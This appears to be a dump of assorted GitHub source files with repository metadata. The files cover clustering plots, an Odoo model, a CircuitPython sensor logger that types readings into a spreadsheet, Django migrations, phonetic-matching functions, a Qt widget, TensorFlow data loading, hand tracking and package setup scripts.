plt.title('The Elbow Method')
plt.xlabel('The Number Of clusters')
plt.ylabel('wcss')
plt.show()
#fitting dataset
kmeans=KMeans(n_clusters=4,init='k-means++',random_state=0)
y_kmeans=kmeans.fit_predict(X)
plt.scatter(X[y_kmeans==0,0],X[y_kmeans==0,1],s=100,c='red',label='clusters1')
plt.scatter(X[y_kmeans==1,0],X[y_kmeans==1,1],s=100,c='blue',label='clusters2')
plt.scatter(X[y_kmeans==2,0],X[y_kmeans==2,1],s=100,c='green',label='clusters3')
plt.scatter(X[y_kmeans==3,0],X[y_kmeans==3,1],s=100,c='yellow',label='clusters4')
plt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=300,c='pink',label='centroids')
plt.title('clusters of stars')
plt.xlabel('review_count')
plt.ylabel('stars')
plt.legend()
plt.show()
| [
"noreply@github.com"
] | aparnamogallapu.noreply@github.com |
a4214f2be262f9ef0f986aad6da8ab0278710bfd | 0575425c3412e38b157ea597c3727f2fe8f111fb | /product_container/models/product_template.py | 97c82cee079bdefc1fb3e810e09589e98b9058dd | [] | no_license | qrtl/crh-custom | b3b49a36c4c7a8fb4591574ccb9ef249c831b496 | e4e807801ff42326bae53963b6fe5caf0849b00c | refs/heads/12.0 | 2023-05-30T20:28:26.375883 | 2019-12-12T05:41:23 | 2020-01-15T09:36:08 | 212,749,332 | 0 | 1 | null | 2023-05-12T09:18:59 | 2019-10-04T06:24:41 | HTML | UTF-8 | Python | false | false | 360 | py | # Copyright 2019 Quartile Limited
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields
class ProductTemplate(models.Model):
_inherit = 'product.template'
container = fields.Selection([
('bottle', 'Bottle'),
('keg', 'Keg')
], help="The value will be used in liquor tax reporting.")
| [
"tashiro@quartile.co"
] | tashiro@quartile.co |
5b1b804ba412f88488a66775b1cd8af3b8f2a81e | 517d461257edd1d6b239200b931c6c001b99f6da | /Circuit_Playground/CircuitPython/Data_Logging/typing/typing_original_.py | 5b9aa66386ae0b84741b00930ee46fc0dee033a7 | [] | no_license | cmontalvo251/Microcontrollers | 7911e173badff93fc29e52fbdce287aab1314608 | 09ff976f2ee042b9182fb5a732978225561d151a | refs/heads/master | 2023-06-23T16:35:51.940859 | 2023-06-16T19:29:30 | 2023-06-16T19:29:30 | 229,314,291 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | # Circuit Playground Express Data Time/Light Intensity/Temp
# Log data to a spreadsheet on-screen
# Open Spreadsheet beforehand and position to start (A,1)
# Use slide switch to start and stop sensor readings
# Time values are seconds since board powered on (relative time)
import time
from digitalio import DigitalInOut, Direction, Pull
import analogio
import board
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import adafruit_thermistor
# Switch to quickly enable/disable
switch = DigitalInOut(board.SLIDE_SWITCH)
switch.pull = Pull.UP
# light level
light = analogio.AnalogIn(board.LIGHT)
# temperature
thermistor = adafruit_thermistor.Thermistor(board.TEMPERATURE, 10000,
10000, 25, 3950)
# Set the keyboard object!
# Sleep for a bit to avoid a race condition on some systems
time.sleep(1)
kbd = Keyboard()
layout = KeyboardLayoutUS(kbd) # US is only current option...
led = DigitalInOut(board.D13) # Set up red LED "D13"
led.direction = Direction.OUTPUT
print("Time\tLight\tTemperature") # Print column headers
def slow_write(string): # Typing should not be too fast for
for c in string: # the computer to be able to accept
layout.write(c)
time.sleep(0.2) # use 1/5 second pause between characters
while True:
if switch.value: # If the slide switch is on, don't log
continue
# Turn on the LED to show we're logging
led.value = True
temp = thermistor.temperature # In Celsius
# if you want Fahrenheit, uncomment the line below
# temp = temp * 9 / 5 + 32
# Format data into value 'output'
output = "%0.1f\t%d\t%0.1f" % (time.monotonic(), light.value, temp)
print(output) # Print to serial monitor
slow_write(output) # Print to spreadsheet
kbd.press(Keycode.DOWN_ARROW) # Code to go to next row
time.sleep(0.01)
kbd.release_all()
for _ in range(3):
kbd.press(Keycode.LEFT_ARROW)
time.sleep(0.015)
kbd.release_all()
time.sleep(0.025) # Wait a bit more for Google Sheets
led.value = False
# Change 0.1 to whatever time you need between readings
time.sleep(0.1) | [
"cmontalvo251@gmail.com"
] | cmontalvo251@gmail.com |
64d2855cd04459ab7a7b86a9e703c6518a7c19f3 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/not/sample_good666.py | 3687c9337e2f798525c72cf0779d606b08e582b2 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | import random
import re
import array
import textwrap
import readline
nterms = 195
n1, n2 = 0, 1
if nterms <= 0:
print("Please provide a positive integer.")
elif nterms == 1:
print("Fibonacci sequence upto", nterms, ":")
print(n1)
else:
print("Fibonacci sequence:")
count = 0
while 0 < 195:
print(n1)
nth = n1 + n2
n1 = n2
n2 = nth
count = count - (2 - 3)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
eff1045a05c5f500f5639905ba8c923fe1ed7f46 | 9df5c483fc09843ca3be78ff68e40ba9dab8f830 | /setup.py | 67e73e0445d9194aceef825eea8fa446efa6367d | [
"Apache-2.0"
] | permissive | skytap/skytap-ansible-inventory | 968ff597f18290deb0a4102c519d6a9064ae04a0 | f01d5174bc4fd03c7f3e8e67a632012c4bfce534 | refs/heads/master | 2021-01-15T14:29:39.838948 | 2017-05-09T20:44:06 | 2017-07-31T00:39:54 | 43,448,039 | 4 | 3 | null | 2017-07-31T00:39:55 | 2015-09-30T17:33:08 | Python | UTF-8 | Python | false | false | 1,300 | py | from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='skytap-ansible-inventory',
version='0.1',
description='Skytap Ansible Inventory',
long_description=long_description,
url='https://github.com/skytap/skytap-ansible-inventory',
author='Joe Burchett',
author_email='jburchett@skytap.com',
license='Apache 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: System :: Systems Administration',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='skytap ansible inventory',
py_modules=["skytap_inventory"],
install_requires=['six', 'requests'],
entry_points={
'console_scripts': [
'skytap_inventory=skytap_inventory:main',
],
},
)
| [
"nidd@skytap.com"
] | nidd@skytap.com |
224fb207ca9a27c14f0294bc89fd4cb9259e4438 | 481acefc8660ee456383844f1731eaa2e6055b0f | /t_6.py | e543af8b0a4b042ad25fae65e8c59b85ae4efd4d | [] | no_license | eugenmorok/Tasks_of_Py | 5378f06062fb7a0ee4faa1ec41a8842f5d7a9a9f | ca79fd3283ce93cbabe5d180e0461dd7c1f67d3c | refs/heads/main | 2023-01-01T08:19:30.843425 | 2020-10-22T04:09:42 | 2020-10-22T04:09:42 | 306,219,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | import sys
x = sys.argv[1].strip().replace(",", "").split()
x.reverse()
x = " ".join(x)
print(x)
| [
"64523467+eugenmorok@users.noreply.github.com"
] | 64523467+eugenmorok@users.noreply.github.com |
6730aafef63549f62e2673d9ec48a2b98ce7cfcc | d044e88e622d9f4ca350aa4fd9d95d7ba2fae50b | /application/dataentry/migrations/0192_auto_20210722_1359.py | 7e1c663d3fec4392b13dc51e6c16f22fc0f16cee | [] | no_license | Tiny-Hands/tinyhands | 337d5845ab99861ae189de2b97b8b36203c33eef | 77aa0bdcbd6f2cbedc7eaa1fa4779bb559d88584 | refs/heads/develop | 2023-09-06T04:23:06.330489 | 2023-08-31T11:31:17 | 2023-08-31T11:31:17 | 24,202,150 | 7 | 3 | null | 2023-08-31T11:31:18 | 2014-09-18T19:35:02 | PLpgSQL | UTF-8 | Python | false | false | 497 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2021-07-22 13:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dataentry', '0191_auto_20210712_1433'),
]
operations = [
migrations.AlterField(
model_name='stationstatistics',
name='budget',
field=models.DecimalField(decimal_places=2, max_digits=17, null=True),
),
]
| [
"scrishel@sbcglobal.net"
] | scrishel@sbcglobal.net |
72a02d4058f097330d8a686d847ee822cf924629 | 2007f537558467326feef6736475d29a1b7ad08c | /flask_project02/testPy/testMain.py | 504901db9096b698231c0b32da81a5c07f4dc649 | [] | no_license | tiakoe/Data_Visualization_System | 1c9512b0874b35ff62513fde29cd345ff4fbb0ee | c9996276d8546c9917eeefac6dcb43540f731b41 | refs/heads/master | 2020-05-05T13:14:50.075485 | 2019-04-08T06:10:50 | 2019-04-08T06:10:50 | 180,068,440 | 1 | 1 | null | 2019-04-08T06:06:36 | 2019-04-08T04:16:14 | JavaScript | UTF-8 | Python | false | false | 1,108 | py | import pymysql
import operator
import time
import calendar
from interval import Interval, IntervalSet
from datetime import datetime, timedelta
import json
from intervals import DateTimeInterval
db = pymysql.connect(user='root', db='mydb3', port=3306, passwd='XX', host='127.0.0.1', charset='utf8')
cursor = db.cursor()
#
# sql = 'SELECT AREAID FROM hydata_swjl_all'
# cursor.execute(sql)
# temp = {}
# all_provin_id=[]
# for i in cursor.fetchall():
# t = str(i[0][0:2])
# if not temp.get(t):
# temp.setdefault(t, 1)
# all_provin_id.append(t)
# temp[t] += 1
# # arr = []
# # for i in temp.values():
# # arr.append(i)
# # arr.sort()
# print('all_province',all_provin_id)
# res=sorted(temp.items(),key=operator.itemgetter(1),reverse=True)
# arr=[]
# for i in res:
# arr.append(str(i[0]))
# print(arr)
#
obj = {
'fdf': 'fds',
'asd': {'fd': 432,
'xx': {'fd':'fds'}
},
'er':'fs'
}
ac = obj
# ac['fd'] = 10
print(ac)
# fd=obj.get('asd')
# fd['fd']=43
# print(obj['asd'])
# # print(obj.items())
# for i in obj.items():
# print(list(i))
| [
"1457925832@qq.com"
] | 1457925832@qq.com |
fe1d8101b5ee617594d53d6177bf3575250263c7 | 45ab485b3e24a86a62f7c3b5654ae799433a88a2 | /lab9/lab9.py | 84473fe1cec900fa393c1fc9d05648efa0a7e3b1 | [] | no_license | elizabethsiegle/cs330_labs | 7fbe23d46ce890f8337e476d288dcd3e64a702bb | b63dae00e6d144961acd9f6c923859fb53017f8d | refs/heads/master | 2021-01-19T17:16:41.278988 | 2017-04-14T15:29:16 | 2017-04-14T15:29:16 | 82,430,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,836 | py | import urllib
import urllib.request
import requests
import re
PhoneticAna = {}
def soundexNaive(name, len=4):
sndx = name[0] #Keep the first letter
for i in name[1:]:
if i in "BFPV":
d = "1"
elif i in "CGJKQSXZ":
d = "2"
elif i in "DT":
d = "3"
elif i in "L":
d = "4"
elif i in "MN":
d = "5"
elif i == "R":
d = "6"
else:
d = ""
if d != sndx[-1]:
sndx += d
return (sndx + (len * '0'))[:len]
def soundex(name, len = 4):
digits = '01230120022455012623010202'
#retain first letter of string
sndx = name[0]
#translate each successive letter in name
for c in name[1:]:
d = digits[ord(c)-ord('A')]
#if 2+ letters with same number are adjacent then just keep 1
if d != '0' and d != sndx[-1]:
sndx += d
#remove all 0s from soundex code
sndx = sndx.replace('0',"")
return(sndx + (len*'0'))[:len]
def metaphone(name):
RULES = [
# Regexp, replacement
[ r'([bcdfhjklmnpqrstvwxyz])\1+',r'\1' ],# Remove doubled consonants except g.
[ '^ae', 'E' ], # ae -> E
[ '^[gkp]n', 'N' ], # initial kn-, gn-, pn- -> N
[ '^wr', 'R' ], # initial wr- -> R
[ '^x', 'S' ], # x- -> S
[ '^wh', 'W' ], # initial wh- -> W
[ 'mb$', 'M' ], # -mb (as in dumb) -> M
[ '(?!^)sch', 'SK' ], # sch -> SK
[ 'th', '0' ], # 0 represents the th sound
[ 't?ch|sh', 'X' ], # tch, tsh, ch, sh -> X
[ 'c(?=ia)', 'X' ], # cia -> X
[ '[st](?=i[ao])', 'X' ], # stia, stio -> X
[ 's?c(?=[iey])', 'S' ], # ci, ce, cy, sci, sce, scy -> S
[ '[cq]', 'K' ], # c, q -> K
[ 'dg(?=[iey])', 'J' ], # dgi, dge, dgy -> J (as in ledger, edgy)
[ 'd', 'T' ], # d -> T
[ 'g(?=h[^aeiou])', '' ], # gh -> silent (gh- not at end or before vowel)
[ 'gn(ed)?', 'N' ], # gne, gnd -> N
[ '([^g]|^)g(?=[iey])',r'\1J' ], # gi, ge, gy, but not gg -> J
[ 'g+', 'K' ], # g, gg -> K (as in egg)
[ 'ph', 'F' ], # ph -> F
[ r'([aeiou])h(?=\b|[^aeiou])',r'\1' ], # silent h if after vowel and no following vowels
[ '[wy](?![aeiou])', '' ], # wy is silent if not followed by vowel
[ 'z', 'S' ], # z -> S
[ 'v', 'F' ], # v -> F
[ '(?!^)[aeiou]+', '' ], # vowels silent unless first letter
]
# Normalise case and remove non-ASCII
name = name.lower()
s = re.sub('[^a-z]', '', name)
# Apply the Metaphone rules
for (rx, rep) in RULES:
s = re.sub(rx, rep, s)
return s.upper()
def task13():
user_in = input('Input name: ')
print("soundexNaive: ", soundexNaive(user_in.upper()))
print("soundex: ", soundex(user_in.upper()))
print("metaphone: ", metaphone(user_in))
#req = urllib2.Request('http://cs.brynmawr.edu/Courses/cs330/spring2017/soundex.txt')
#response = urllib2.urlopen(req)
#data = response.read()
def task4():
link = "http://cs.brynmawr.edu/Courses/cs330/spring2017/FemaleNames2.txt"
f = requests.get(link)
data = f.text.split('\n')
for line in data:
print(line)
p_key = soundex(line.upper())
if p_key not in PhoneticAna:
dict[p_key] = [line]
else:
dict[p_key].append(line)
def printDict():
for k, v in PhoneticAna.items():
if len(v) >= 2:
s = ','
print(k, end='\t')
print(s.join(v))
#task4()
#printDict()
task13()
| [
"lizzie.siegle@gmail.com"
] | lizzie.siegle@gmail.com |
c218096f89e45e102cb1e2545d15dab1e9bd6169 | ecb5535a106fdedc9bf9513f39fb42f06f1106b8 | /funรงรตesI.py | 01ba3a4cd780a665639dd0e1870e0d52e8140c28 | [
"MIT"
] | permissive | ricardowiest/Exercicios_Python | 27d9351bc3dfcfdefe454886e1c2a46b78fbeeab | bed8e88d142379d5f09216f4a9f5b00f097bb8fb | refs/heads/master | 2022-12-14T07:21:53.260948 | 2020-09-03T17:23:50 | 2020-09-03T17:23:50 | 265,958,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | def potencia(base, exp):
pot = base ** exp
return pot
a = potencia (5, 6)
print(a)
def soma(n1, n2, n3):
return n1+n2+n3
print(soma(10, 33, 15))
def OpMat(n1, n2):
soma = n1 + n2
return soma, n1 * n2
a, b = OpMat(2, 3)
print(a)
print(b)
from random import randint
def dado():
num = randint(1,6)
print(num)
dado()
| [
"ricardowiest@gmail.com"
] | ricardowiest@gmail.com |
d67f9203a0dc7596348adc5a8fff909435b4c8c0 | a4fec1cb7723bf925ff19b5b1630708f90c60e59 | /UCSB_TS_slowcontrol/collapsible_widget.py | fce3f193b9f8a1c5b624de6b027a5acbe3c9bbb5 | [
"MIT"
] | permissive | RunzZhang/runze | d9e7fed392f5e8314d44454aa7191168ff68aa9f | a2a08c780d2312f031b69bc2d6e4e854e2bdb900 | refs/heads/master | 2023-08-04T13:52:15.409799 | 2023-07-28T18:24:22 | 2023-07-28T18:24:22 | 192,990,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from PySide2 import QtWidgets, QtCore, QtGui
import sys,random
class CollapsibleBox(QtWidgets.QWidget):
def __init__(self, title="", parent=None):
super(CollapsibleBox, self).__init__(parent)
self.toggle_button = QtWidgets.QToolButton(
text=title, checkable=True, checked=False
)
self.toggle_button.setStyleSheet("QToolButton { border: none; }")
self.toggle_button.setToolButtonStyle(
QtCore.Qt.ToolButtonTextBesideIcon
)
self.toggle_button.setArrowType(QtCore.Qt.RightArrow)
self.toggle_button.pressed.connect(self.on_pressed)
self.toggle_animation = QtCore.QParallelAnimationGroup(self)
self.content_area = QtWidgets.QScrollArea(
maximumHeight=0, minimumHeight=0
)
self.content_area.setSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed
)
self.content_area.setFrameShape(QtWidgets.QFrame.NoFrame)
lay = QtWidgets.QVBoxLayout(self)
lay.setSpacing(0)
lay.setContentsMargins(0, 0, 0, 0)
lay.addWidget(self.toggle_button)
lay.addWidget(self.content_area)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self, b"minimumHeight")
)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self, b"maximumHeight")
)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self.content_area, b"maximumHeight")
)
@QtCore.Slot()
def on_pressed(self):
checked = self.toggle_button.isChecked()
self.toggle_button.setArrowType(
QtCore.Qt.DownArrow if not checked else QtCore.Qt.RightArrow
)
self.toggle_animation.setDirection(
QtCore.QAbstractAnimation.Forward
if not checked
else QtCore.QAbstractAnimation.Backward
)
self.toggle_animation.start()
def setContentLayout(self, layout):
lay = self.content_area.layout()
del lay
self.content_area.setLayout(layout)
collapsed_height = (
self.sizeHint().height() - self.content_area.maximumHeight()
)
print("c_height", collapsed_height)
content_height = layout.sizeHint().height()
for i in range(self.toggle_animation.animationCount()):
animation = self.toggle_animation.animationAt(i)
animation.setDuration(500)
animation.setStartValue(collapsed_height)
animation.setEndValue(collapsed_height + content_height)
content_animation = self.toggle_animation.animationAt(
self.toggle_animation.animationCount() - 1
)
content_animation.setDuration(500)
content_animation.setStartValue(0)
content_animation.setEndValue(content_height)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
w = QtWidgets.QMainWindow()
w.setCentralWidget(QtWidgets.QWidget())
dock = QtWidgets.QDockWidget("Collapsible Demo")
w.addDockWidget(QtCore.Qt.LeftDockWidgetArea, dock)
scroll = QtWidgets.QScrollArea()
dock.setWidget(scroll)
content = QtWidgets.QWidget()
scroll.setWidget(content)
scroll.setWidgetResizable(True)
vlay = QtWidgets.QVBoxLayout(content)
for i in range(10):
box = CollapsibleBox("Collapsible Box Header-{}".format(i))
vlay.addWidget(box)
lay = QtWidgets.QVBoxLayout()
for j in range(8):
label = QtWidgets.QLabel("{}".format(j))
color = QtGui.QColor(*[random.randint(0, 255) for _ in range(3)])
label.setStyleSheet(
"background-color: {}; color : white;".format(color.name())
)
label.setAlignment(QtCore.Qt.AlignCenter)
lay.addWidget(label)
box.setContentLayout(lay)
vlay.addStretch()
w.resize(640, 480)
w.show()
sys.exit(app.exec_()) | [
"52052572+RunzZhang@users.noreply.github.com"
] | 52052572+RunzZhang@users.noreply.github.com |
bf010df1f75dd40be74a35d5386c1c0ddd881547 | ac47b880e8dbd66c5ad1da40871c3336a6e67934 | /test/HandTrackingMin.py | 17fa09047fa97845ca59fdd344d0ae1d771eb04a | [] | no_license | sebastien-prudhomme/python | 6e94fd4a0afdc9337c2e082c54630e350d8ce406 | c69073c39d852cea69e095524b50fb807fb14cba | refs/heads/master | 2023-08-04T21:02:57.669194 | 2021-09-09T14:54:17 | 2021-09-09T14:54:17 | 404,734,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | import cv2
import mediapipe
import time
capture = cv2.VideoCapture(0)
mediapipeHands = mediapipe.solutions.hands
hands = mediapipeHands.Hands()
mediapipeDraw = mediapipe.solutions.drawing_utils
while True:
success, img = capture.read()
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = hands.process(imgRGB)
if results.multi_hand_landmarks:
for handLandmarks in results.multi_hand_landmarks:
mediapipeDraw.draw_landmarks(img, handLandmarks, mediapipeHands.HAND_CONNECTIONS)
cv2.imshow("Image", img)
cv2.waitKey(1)
| [
"sebastien.prudhomme@gmail.com"
] | sebastien.prudhomme@gmail.com |
dacde4cdd20fb123305dd593fe4b5940f0a4caf1 | 25b0cca3405c74e4452750292c02e3878376fb6d | /TF2_customized_dataset.py | 8c588c457eefc016105a5cef33edf6d4e5010d00 | [] | no_license | shihezichen/openai | db508c3856e933af3bbfcf1d90fa1202e1f54890 | 82dceaa60f482c9756aec4245e3cea44e010ee79 | refs/heads/master | 2023-03-06T03:02:30.711894 | 2021-02-17T03:05:37 | 2021-02-17T03:05:37 | 266,487,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | from PIL import Image
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
BASE_DIR = '/home/arthur/Downloads/MOOC_TF2.1/class4/class4/FASHION_FC/fashion_image_label/'
TRAIN_PATH = BASE_DIR + 'fashion_train_jpg_60000'
TRAIN_LABEL = BASE_DIR + 'fashion_train_jpg_60000.txt'
TEST_PATH = BASE_DIR + 'fashion_test_jpg_10000'
TEST_LABEL = BASE_DIR + 'fashion_test_jpg_10000.txt'
X_TRAIN_SAVE_PATH = BASE_DIR + 'x_train_save.npy'
Y_TRAIN_SAVE_PATH = BASE_DIR + 'y_train_save.npy'
X_TEST_SAVE_PATH = BASE_DIR + 'x_test_save.npy'
Y_TEST_SAVE_PATH = BASE_DIR + 'y_test_save.npy'
# ไปๅๅงๆไปถๅ ่ฝฝ็ๆๆฐๆฎ้
def generate_dataset(path, lable_file):
f = open(lable_file, 'r')
contents = f.readlines()
f.close()
x, y_ = [], []
for content in contents:
img_name, label_value = content.split()
img_path = os.path.join(path, img_name)
img = Image.open(img_path)
# ๅไธบ8ไฝๅฎฝ็ฐๅบฆๅผ็np.arrayๆ ผๅผ
img = np.array(img.convert('L'))
# ๆฐๆฎๅฝไธๅ
img = img / 255.0
x.append(img)
y_.append(label_value)
x = np.array(x)
# ๅไธบnp.array ๅนถๅไธบ64ไฝๆดๆฐ
y_ = np.array(y_).astype(np.int64)
return x, y_
# ่ฝฌ่ฝฝๆฐๆฎ, ๅฆๆๆไฟๅญ, ไปไฟๅญๆไปถๅ ่ฝฝ, ๅฆๅไปๅๅงๆไปถ็ๆๆฐๆฎ้
def load_data():
global TRAIN_PATH, TRAIN_LABEL, TEST_PATH, TEST_LABEL
global X_TRAIN_SAVE_PATH, Y_TRAIN_SAVE_PATH, X_TEST_SAVE_PATH, Y_TEST_SAVE_PATH
is_saved = os.path.exists(X_TRAIN_SAVE_PATH) and os.path.exists(X_TRAIN_SAVE_PATH) \
and os.path.exists(Y_TEST_SAVE_PATH) and os.path.exists(Y_TEST_SAVE_PATH)
if is_saved:
print('-' * 20, 'Load Datasets', '-' * 20)
x_train = np.load(X_TRAIN_SAVE_PATH)
x_test = np.load(X_TEST_SAVE_PATH)
y_train = np.load(Y_TRAIN_SAVE_PATH)
y_test = np.load(Y_TEST_SAVE_PATH)
else:
print('-'*20, 'Generate Datasets', '-'*20)
x_train, y_train = generate_dataset(TRAIN_PATH, TRAIN_LABEL)
x_test, y_test = generate_dataset(TEST_PATH, TEST_LABEL)
print('-'*20, 'Save Datasets', '-'*20)
x_train = np.reshape(x_train, (len(x_train), -1))
x_test = np.reshape(x_test, (len(x_test), -1))
np.save(X_TRAIN_SAVE_PATH, x_train)
np.save(X_TEST_SAVE_PATH, x_test)
np.save(Y_TRAIN_SAVE_PATH, y_train)
np.save(Y_TEST_SAVE_PATH, y_test)
return (x_train, y_train), (x_test, y_test)
if __name__ == '__main__':
(x_train, y_train), (x_test, y_test) = load_data()
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer=tf.keras.optimizers.Adam(),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
metrics=['sparse_categorical_accuracy'])
model.fit(x_train, y_train, batch_size=6000, epochs=5, validation_data=(x_test, y_test), validation_freq=1)
model.summary() | [
"noreply@github.com"
] | shihezichen.noreply@github.com |
f99a0d57cda761ce05b5619805a6cd2e49261cb7 | 716cab8785f70a22ef1dd78a4037f71ed9f16cd7 | /Mystry_Python_Theater/pscore.py | b1f387fa32f203330af21c245be925535b952a6a | [
"MIT"
] | permissive | Phillyclause89/reddit_scripts | ffc29dfd58fc382082273ab4f08b8989d27be582 | bacf7e7061dda2384e4eb60e3cc2d6ff20e28766 | refs/heads/master | 2020-09-27T20:12:16.625171 | 2019-12-13T05:19:10 | 2019-12-13T05:19:10 | 226,600,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def get_player_score():
score = []
for i in range(0, 5):
while True:
try:
s = float(input('Enter golf scores between 78 and 100: '))
if 78 <= s <= 100:
score.append(s)
break
raise ValueError
except ValueError:
print("Invalid Input!")
return score
print(get_player_score())
| [
"45711864+Phillyclause89@users.noreply.github.com"
] | 45711864+Phillyclause89@users.noreply.github.com |
7b79e86bb8bebaacaa408a3761d9797b77af398a | 5665d4d3730964c49f4163382dc080acd6f9edd2 | /grouped-bar-chart.py | 8f99828840ab742a1fc31318dd8da97299689a6c | [] | no_license | victoriast0408/py | 4861298557cd8067d5ef5c5afc75dc9370c91c43 | 892edd571f6d573cdf7ecbd7783b028d37fe52c6 | refs/heads/master | 2020-08-01T07:04:42.514787 | 2019-10-03T12:40:06 | 2019-10-03T12:40:06 | 210,908,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | import plotly.graph_objects as go
import pandas as pd
bills = pd.read_excel('billsjan2018.xlsx')
fig = go.Figure(data=[
go.Bar(name='Paid cash', x=bills.date, y=bills.paid_cash),
go.Bar(name='Paid card', x=bills.date, y=bills.paid_card),
go.Bar(name='Paid customer card', x=bills.date, y=bills.paid_customer_card),
],
)
# Change the bar mode
fig.update_layout(barmode='group')
fig.show()
if __name__ == '__main__':
app.run_server(debug=True) | [
"victoria@Victorias-MacBook-Air.local"
] | victoria@Victorias-MacBook-Air.local |
a2fa38661bb368c2e9fc95657326e35bd11a12bf | 716e1f229eab5b5087752ebf32c3370a87958798 | /src/program/migrations/0091_eventproposal_tags.py | 5ffe83aaeaa59c036a6fdccafff7d4660093c85a | [
"BSD-3-Clause"
] | permissive | bornhack/bornhack-website | 2e8810e00f7a48a8a7e82f02f66d67edcce6e404 | 767deb7f58429e9162e0c2ef79be9f0f38f37ce1 | refs/heads/master | 2023-08-31T23:31:04.344829 | 2023-08-08T21:59:19 | 2023-08-08T21:59:19 | 43,702,500 | 9 | 43 | BSD-3-Clause | 2023-09-11T09:46:14 | 2015-10-05T17:45:55 | Python | UTF-8 | Python | false | false | 688 | py | # Generated by Django 3.0.3 on 2020-04-21 20:54
import taggit.managers
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("taggit", "0003_taggeditem_add_unique_index"),
("utils", "0004_uuidtaggeditem"),
("program", "0090_event_tags"),
]
operations = [
migrations.AddField(
model_name="eventproposal",
name="tags",
field=taggit.managers.TaggableManager(
help_text="A comma-separated list of tags.",
through="utils.UUIDTaggedItem",
to="taggit.Tag",
verbose_name="Tags",
),
),
]
| [
"noreply@github.com"
] | bornhack.noreply@github.com |
9efe0099db495a6abf8ec4e5391c09aec9b087d3 | 525bdfe2c7d33c901598a501c145df94a3e162b0 | /math_projects/kateryna/bin/constants.py | c2f278310902832628add1fa859476272f1c01ff | [] | no_license | davendiy/ads_course2 | f0a52108f1cab8619b2e6e2c6c4383a1a4615c15 | e44bf2b535b34bc31fb323c20901a77b0b3072f2 | refs/heads/master | 2020-04-06T09:37:12.983564 | 2019-05-09T10:28:22 | 2019-05-09T10:28:22 | 157,349,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | #!/usr/bin/env python3
# -*-encoding: utf-8-*-
import logging
DEFAULT_N = 1000 # ะบ-ัั ะตะปะตะผะตะฝััะฒ, ัะบั ะฟะพะฒะตััะฐั ะฟะพััะบ ะทะฐ ัะผะพะฒัะฐะฝะฝัะผ
# ัะธะฟะธ ะตะปะตะผะตะฝััะฒ (ะทะฝะฐัะตะฝะฝั - ะฝะฐะทะฒะธ ัะฐะฑะปะธัั ั ะะ)
KEY_WORD = 'Key_words'
SITE = 'Sites'
LINK = 'Links'
CATEGORIES = 'Categories' # ะฝะฐะทะฒะฐ ัะฐะฑะปะธัั ะบะฐัะตะณะพััะน
DEFAULT_DATABASE = 'data.db' # ัะปัั
ะดะพ ะฑะด ะทะฐ ัะผะพะฒัะฐะฝะฝัะผ
DEFAULT_LOG_GUI = 'parser_gui.log' # ัะฐะนะป ะท ะปะพะณะฐะผะธ ะดะปั ะณัะฐัััะฝะพะณะพ ัะฝัะตััะตะนัั
DEFAULT_LOG_CLIENT = 'parser_client.log' # ัะฐะนะป ะท ะปะพะณะฐะผะธ ะดะปั ะบะปััะฝัะฐ
FORMAT = '%(asctime) -15s %(message)s' # ัะพัะผะฐั ะทะฐะฟะธัั: <ัะฐั> <ะฟะพะฒัะดะพะผะปะตะฝะฝั>
SLEEP = 1 # ััะธะฒะฐะปัััั ัะฝัะตัะฒะฐะปั ะผะพะฝััะพัะธะฝะณั (ั ะณะพะดะธะฝะฐั
)
# ัะฟะธัะบะธ ะฟะพะปัะฒ ะดะปั ะบะพะถะฝะพั ัะฐะฑะปะธัั, ัะบั ะฒัะดะพะฑัะฐะถะฐััััั
LINKS_GUI_FIELDS = ['Link', 'Category', 'Date', 'Information']
